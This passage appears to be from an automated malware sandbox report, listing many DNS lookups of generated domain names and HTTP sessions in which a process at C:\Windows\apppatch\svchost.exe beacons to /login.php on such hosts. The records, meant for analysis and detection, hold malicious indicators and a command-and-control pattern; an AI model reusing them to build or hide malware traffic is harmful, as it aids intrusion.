                                                                                                                                                                                                            Sep 8, 2024 09:00:32.259603024 CEST1.1.1.1192.168.2.40x5dd9Name error (3)qebyvyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.261674881 CEST1.1.1.1192.168.2.40x3714Name error (3)vofyruc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.265224934 CEST1.1.1.1192.168.2.40xab70Name error (3)galycah.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.266846895 CEST1.1.1.1192.168.2.40xbbcfName error (3)pupyjap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.267627001 CEST1.1.1.1192.168.2.40xbf99Name error (3)vopyjac.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.268933058 CEST1.1.1.1192.168.2.40x5cc6Name error (3)qekytig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.269236088 CEST1.1.1.1192.168.2.40xdd66Name error (3)lyvyver.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.277266026 CEST1.1.1.1192.168.2.40x6bc5Name error (3)ganyvyw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.284123898 CEST1.1.1.1192.168.2.40xd599Name error (3)galypob.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.321073055 CEST1.1.1.1192.168.2.40x1bf5Name error (3)qedykep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.326355934 CEST1.1.1.1192.168.2.40x2ba3Name error (3)gadykyz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.327100992 CEST1.1.1.1192.168.2.40x87a8Name error (3)lymynuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.332638979 CEST1.1.1.1192.168.2.40xe424Name error (3)gaqynih.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.335721016 CEST1.1.1.1192.168.2.40x76a7Name error (3)pumybuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.336309910 CEST1.1.1.1192.168.2.40xa807Name error (3)vofykyt.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.342987061 CEST1.1.1.1192.168.2.40x210fName error (3)lysyjex.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.344105005 CEST1.1.1.1192.168.2.40x30fName error (3)qexysev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.347729921 CEST1.1.1.1192.168.2.40xe286Name error (3)lygylur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.348073959 CEST1.1.1.1192.168.2.40x767bName error (3)qeqyniq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.348402023 CEST1.1.1.1192.168.2.40x4c0aName error (3)purymog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.349430084 CEST1.1.1.1192.168.2.40xdf8cName error (3)vowymom.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.349805117 CEST1.1.1.1192.168.2.40x78d7Name error (3)lyryman.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.350158930 CEST1.1.1.1192.168.2.40x10aaName error (3)pufylul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.351135015 CEST1.1.1.1192.168.2.40x4c46Name error (3)gahyziw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.351970911 CEST1.1.1.1192.168.2.40x72cName error (3)vocydyc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.356365919 CEST1.1.1.1192.168.2.40xfe5cName error (3)qegylul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.369903088 CEST1.1.1.1192.168.2.40xcb5Name error (3)vojyzik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.370770931 CEST1.1.1.1192.168.2.40x4ab9Name error (3)qekyxaq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.371181965 CEST1.1.1.1192.168.2.40xa5b7Name error (3)lykyxoj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.371490955 CEST1.1.1.1192.168.2.40xbbf4Name error (3)pujyxoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.371507883 CEST1.1.1.1192.168.2.40xe41eName error (3)pupywyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.373362064 CEST1.1.1.1192.168.2.40x880eName error (3)puzypav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.374702930 CEST1.1.1.1192.168.2.40x5767Name error (3)qebyfup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.377090931 CEST1.1.1.1192.168.2.40xa63Name error (3)lyvyfux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.377099991 CEST1.1.1.1192.168.2.40x66bbName error (3)vopyqef.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.378148079 CEST1.1.1.1192.168.2.40x35c3Name error (3)ganyfuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.385447979 CEST1.1.1.1192.168.2.40x62bdName error (3)qexyvyg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.396733999 CEST1.1.1.1192.168.2.40x85acName error (3)puvydyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.398288965 CEST1.1.1.1192.168.2.40xfbf3Name error (3)volypof.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.400468111 CEST1.1.1.1192.168.2.40x8616Name error (3)gatyqeb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.401422024 CEST1.1.1.1192.168.2.40x7f76Name error (3)qetyqag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.417097092 CEST1.1.1.1192.168.2.40x7025Name error (3)lykytin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.467010021 CEST1.1.1.1192.168.2.40x8fcfName error (3)vonybuk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.478488922 CEST1.1.1.1192.168.2.40x23b9Name error (3)lyxysad.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.484985113 CEST1.1.1.1192.168.2.40x9315Name error (3)gacydes.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.652981997 CEST1.1.1.1192.168.2.40xcfd1Name error (3)vocycat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.654620886 CEST1.1.1.1192.168.2.40x673fName error (3)lyrygid.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.658427954 CEST1.1.1.1192.168.2.40x7e2Name error (3)lygywyj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.663328886 CEST1.1.1.1192.168.2.40x4a70Name error (3)vowyguf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.667299986 CEST1.1.1.1192.168.2.40x8e3bName error (3)gaqyfub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.143930912 CEST1.1.1.1192.168.2.40x49acName error (3)gadyfys.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.144088984 CEST1.1.1.1192.168.2.40x8327Name error (3)qedynug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.155252934 CEST1.1.1.1192.168.2.40x91faName error (3)qeqyxil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.155312061 CEST1.1.1.1192.168.2.40x911fName error (3)pujyjol.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.253880978 CEST1.1.1.1192.168.2.40x7bf3Name error (3)lyryvaj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.278109074 CEST1.1.1.1192.168.2.40x3b9Name error (3)vowycok.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.279119968 CEST1.1.1.1192.168.2.40xfd04Name error (3)qexyluq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.283684969 CEST1.1.1.1192.168.2.40x7f5Name error (3)qexyreg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.666269064 CEST1.1.1.1192.168.2.40x35dcName error (3)qekyqoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.671494007 CEST1.1.1.1192.168.2.40x4574Name error (3)ganyzuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.672431946 CEST1.1.1.1192.168.2.40x6273Name error (3)pupydev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.679483891 CEST1.1.1.1192.168.2.40x2a7dName error (3)vopydaf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.679868937 CEST1.1.1.1192.168.2.40xdbe3Name error (3)lykymij.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.680973053 CEST1.1.1.1192.168.2.40x7505Name error (3)vocykec.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.685417891 CEST1.1.1.1192.168.2.40x3171Name error (3)gacyqoz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.687016010 CEST1.1.1.1192.168.2.40xbd77Name error (3)vowyzuf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.687036991 CEST1.1.1.1192.168.2.40xeb3dName error (3)puryxuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.690013885 CEST1.1.1.1192.168.2.40x9018Name error (3)qebylyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.691950083 CEST1.1.1.1192.168.2.40x6e1aName error (3)lyxymix.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.692836046 CEST1.1.1.1192.168.2.40xad84Name error (3)pufydaq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.698297024 CEST1.1.1.1192.168.2.40x5d2Name error (3)qegyfeq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.698312044 CEST1.1.1.1192.168.2.40x49e2Name error (3)gahyfyh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.698399067 CEST1.1.1.1192.168.2.40xed90Name error (3)lyryxud.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.699223995 CEST1.1.1.1192.168.2.40x7baaName error (3)vonyzut.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.699690104 CEST1.1.1.1192.168.2.40xe082Name error (3)qetyxiv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.699703932 CEST1.1.1.1192.168.2.40x45d4Name error (3)vocyqot.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.700361013 CEST1.1.1.1192.168.2.40xc724Name error (3)pujygug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.713061094 CEST1.1.1.1192.168.2.40xab0cName error (3)vojygym.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.714040041 CEST1.1.1.1192.168.2.40x43dfName error (3)lykygun.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.714963913 CEST1.1.1.1192.168.2.40xfba6Name error (3)vopycoc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.718970060 CEST1.1.1.1192.168.2.40x39bcName error (3)qebyrel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.719480991 CEST1.1.1.1192.168.2.40x4a2dName error (3)gatycis.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.730494976 CEST1.1.1.1192.168.2.40x5a25Name error (3)ganyrew.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.757437944 CEST1.1.1.1192.168.2.40xead9Name error (3)gadydow.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.759149075 CEST1.1.1.1192.168.2.40x9556Name error (3)lyvylyx.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.761838913 CEST1.1.1.1192.168.2.40xa9f8Name error (3)puvylep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.767554998 CEST1.1.1.1192.168.2.40xf44cName error (3)pufybyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.768774033 CEST1.1.1.1192.168.2.40x992cName error (3)pujymiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.769752979 CEST1.1.1.1192.168.2.40xa841Name error (3)qetysog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.770304918 CEST1.1.1.1192.168.2.40x5f07Name error (3)qegynul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.771945000 CEST1.1.1.1192.168.2.40xae8cName error (3)vojymuk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.775806904 CEST1.1.1.1192.168.2.40xb166Name error (3)lyryson.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.775818110 CEST1.1.1.1192.168.2.40x2ac5Name error (3)gahynuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.776604891 CEST1.1.1.1192.168.2.40xdbf9Name error (3)lygynyr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.783773899 CEST1.1.1.1192.168.2.40xbfadName error (3)purypig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.784715891 CEST1.1.1.1192.168.2.40xd2eName error (3)qekyhug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.785196066 CEST1.1.1.1192.168.2.40x7d81Name error (3)qexykav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.785360098 CEST1.1.1.1192.168.2.40xd60dName error (3)vowypim.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.785525084 CEST1.1.1.1192.168.2.40x77cbName error (3)gacykas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.787949085 CEST1.1.1.1192.168.2.40xb0c0Name error (3)vofybet.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.787959099 CEST1.1.1.1192.168.2.40x7aa3Name error (3)gaqypuh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.790687084 CEST1.1.1.1192.168.2.40x523eName error (3)qeqytuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.792280912 CEST1.1.1.1192.168.2.40xd44eName error (3)qedyvap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.793040991 CEST1.1.1.1192.168.2.40xf6c6Name error (3)volyjif.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.794044971 CEST1.1.1.1192.168.2.40xf036Name error (3)pumytyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.794132948 CEST1.1.1.1192.168.2.40xa6b4Name error (3)lyxyjod.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.796139002 CEST1.1.1.1192.168.2.40x758dName error (3)lymytuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.797219992 CEST1.1.1.1192.168.2.40xa069Name error (3)lysyvax.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.799263954 CEST1.1.1.1192.168.2.40x8514Name error (3)lyvywar.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.799690008 CEST1.1.1.1192.168.2.40x895Name error (3)gadyvez.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.799758911 CEST1.1.1.1192.168.2.40x2f01Name error (3)puzyjov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.801455975 CEST1.1.1.1192.168.2.40xdfc4Name error (3)pupycop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.802409887 CEST1.1.1.1192.168.2.40x452dName error (3)vonyryk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.840253115 CEST1.1.1.1192.168.2.40x2c0bName error (3)gaqyzyb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.842442989 CEST1.1.1.1192.168.2.40xa4a7Name error (3)lygyfej.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.847392082 CEST1.1.1.1192.168.2.40x211bName error (3)puvywal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.847418070 CEST1.1.1.1192.168.2.40xde42Name error (3)qexyqip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.860507011 CEST1.1.1.1192.168.2.40x47Name error (3)galyhib.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.942596912 CEST1.1.1.1192.168.2.40x4e9cName error (3)puzymup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.066040993 CEST1.1.1.1192.168.2.40x3c1fName error (3)qeqylyg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.349431992 CEST1.1.1.1192.168.2.40xfde6Name error (3)vowykat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.353049040 CEST1.1.1.1192.168.2.40xd090Name error (3)pufypuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.356031895 CEST1.1.1.1192.168.2.40x8addName error (3)qexynyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.361721992 CEST1.1.1.1192.168.2.40x9161Name error (3)gahydos.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.370935917 CEST1.1.1.1192.168.2.40x4196Name error (3)puvymug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.371103048 CEST1.1.1.1192.168.2.40x5238Name error (3)lyvymun.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.374803066 CEST1.1.1.1192.168.2.40x7b29Name error (3)qetylel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.377490044 CEST1.1.1.1192.168.2.40x3acbName error (3)lygysid.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.398865938 CEST1.1.1.1192.168.2.40x693eName error (3)vojydoc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.398926973 CEST1.1.1.1192.168.2.40xca60Name error (3)purylal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.402306080 CEST1.1.1.1192.168.2.40x8064Name error (3)vocymum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.403820038 CEST1.1.1.1192.168.2.40x645eName error (3)lyryler.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.410487890 CEST1.1.1.1192.168.2.40xb470Name error (3)gacynyh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.416316032 CEST1.1.1.1192.168.2.40xfc04Name error (3)vojybef.comnonenoneA (IP address)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49732 | 188.114.96.3 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 08:58:45.069648981 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
Sep 8, 2024 08:58:45.816704988 CEST | 791 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:45 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://qegyhig.com/login.php
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fo04kOXa0s8BvGPufwe1bQVFw4Z5mCTiSGfiOIPbUyGN6Zn8QaW4bGfyn6kII9ZgPbsVLnTxKftZilNV7NVGLkMbseDzCchk0F36fP%2ByxBPiOq%2FER%2Fh7sQRcMUqdEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0d4a49a9429a-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Sep 8, 2024 08:58:47.362576008 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
Sep 8, 2024 08:58:47.720961094 CEST | 803 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:47 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://qegyhig.com/login.php
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cN04xPru%2Fcs8mY%2B6xIeEfcSHAU8Q1D9sYo4t0GGMnHoVpFugt%2BMwooRHa79c8jiC%2FRv6h8qwRH6N%2FzY%2B0es%2F5qgGqRL0Bw6Fte1%2B3YyKktivEWfHC6Y7sZlSGF%2FNgQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0d5659a2429a-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49733 | 208.100.26.245 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 08:58:45.074459076 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
Sep 8, 2024 08:58:45.596396923 CEST | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:45 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Sep 8, 2024 08:58:45.604758024 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
Sep 8, 2024 08:58:45.724021912 CEST | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:45 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
